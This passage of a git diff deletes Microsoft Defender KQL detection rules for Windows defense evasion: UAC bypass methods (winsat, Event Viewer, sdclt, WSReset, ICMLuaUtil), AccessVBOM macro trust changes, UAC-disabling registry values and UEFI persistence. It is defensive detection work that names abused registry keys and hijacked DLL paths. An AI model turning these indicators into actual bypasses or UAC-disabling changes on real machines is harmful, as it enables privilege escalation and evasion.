Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/22 -// Level: high -// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM" \ No newline at end of file diff --git a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql b/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql deleted file mode 100644 index b8536a1a..00000000 --- a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/27 -// Level: critical -// Description: Detects indicators of a UAC bypass method by mocking directories -// Tags: attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where FolderPath contains "C:\\Windows \\System32\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql deleted file mode 100644 index 8d57f867..00000000 --- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql deleted file mode 100644 index 503d8c5f..00000000 --- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql deleted file mode 100644 index 979b06ac..00000000 --- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql deleted file mode 100644 index ba29c60d..00000000 --- a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/31 -// Level: high -// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files"))) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql deleted file mode 100644 index f8815880..00000000 --- a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql deleted file mode 100644 index c912f517..00000000 --- a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql deleted file mode 100644 index c45c8dd3..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql deleted file mode 100644 index b14f6498..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql b/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql deleted file mode 100644 index 949e3b2b..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_DismHost.kql b/Defense Evasion/UAC_Bypass_Using_DismHost.kql deleted file mode 100644 index 63f130be..00000000 --- a/Defense Evasion/UAC_Bypass_Using_DismHost.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe") \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql b/Defense Evasion/UAC_Bypass_Using_EventVwr.kql deleted file mode 100644 index 3043fd99..00000000 --- a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) -// Date: 2022/04/27 -// Level: high -// Description: Detects the pattern of a UAC bypass using Windows Event Viewer -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql deleted file mode 100644 index 974b22fe..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/22 -// Level: high -// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql deleted file mode 100644 index 26df3a86..00000000 --- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql deleted file mode 100644 index 25b12cc5..00000000 --- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql deleted file mode 100644 index 1ca85fad..00000000 --- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql deleted file mode 100644 index eaf21560..00000000 --- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql deleted file mode 100644 index 7d63fa2a..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/17 -// Level: high -// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceImageLoadEvents -| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll"))) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql deleted file mode 100644 index cadc4f08..00000000 --- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql deleted file mode 100644 index ebc4f60d..00000000 --- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql deleted file mode 100644 index 79b84858..00000000 --- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql deleted file mode 100644 index a2dfe81e..00000000 --- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck") \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql deleted file mode 100644 index 594500b1..00000000 --- a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql deleted file mode 100644 index ef7a7239..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe") \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql deleted file mode 100644 index 96f8c1bd..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s") \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql deleted file mode 100644 index dc52850a..00000000 --- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql b/Defense Evasion/UAC_Bypass_Via_Wsreset.kql deleted file mode 100644 index 7ddbf642..00000000 --- a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Dmitry Uchakin -// Date: 2020/10/07 -// Level: high -// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_WSReset.kql b/Defense Evasion/UAC_Bypass_WSReset.kql deleted file mode 100644 index b39549cb..00000000 --- a/Defense Evasion/UAC_Bypass_WSReset.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System")) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql b/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql deleted file mode 100644 index ea6ebd96..00000000 --- a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Dmitry Uchakin -// Date: 2020/10/06 -// Level: high -// Description: Attempts to load dismcore.dll after dropping it -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll")) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql b/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql deleted file mode 100644 index c13ab477..00000000 --- a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/03/19 -// Level: high -// Description: Detects UAC bypass method using Windows event viewer -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey endswith "\\mscfile\\shell\\open\\command" \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql b/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql deleted file mode 100644 index e6a2379f..00000000 --- a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Elastic (idea) -// Date: 2022/09/13 -// Level: high -// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe"))) \ No newline at end of file diff --git a/Defense Evasion/UAC_Bypass_via_Sdclt.kql b/Defense Evasion/UAC_Bypass_via_Sdclt.kql deleted file mode 100644 index 62170641..00000000 --- a/Defense Evasion/UAC_Bypass_via_Sdclt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Omer Yampel, Christian Burkard (Nextron Systems) -// Date: 2017/03/17 -// Level: high -// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue") \ No newline at end of file diff --git a/Defense Evasion/UAC_Disabled.kql b/Defense Evasion/UAC_Disabled.kql deleted file mode 100644 index 0ee19c33..00000000 --- a/Defense Evasion/UAC_Disabled.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" \ No newline at end of file diff --git a/Defense Evasion/UAC_Notification_Disabled.kql b/Defense Evasion/UAC_Notification_Disabled.kql deleted file mode 100644 index 0c9d6980..00000000 --- a/Defense Evasion/UAC_Notification_Disabled.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/05/10 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. -UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. -When "UACDisableNotify" is set to 1, UAC prompts are suppressed. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify" \ No newline at end of file diff --git a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql b/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql deleted file mode 100644 index 684fe543..00000000 --- a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2024/05/10 -// Level: medium -// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. -The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. -When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" \ No newline at end of file diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql deleted file mode 100644 index b24cd1fc..00000000 --- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/18 -// Level: high -// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method -// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001 -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql deleted file mode 100644 index dba934a8..00000000 --- a/Defense 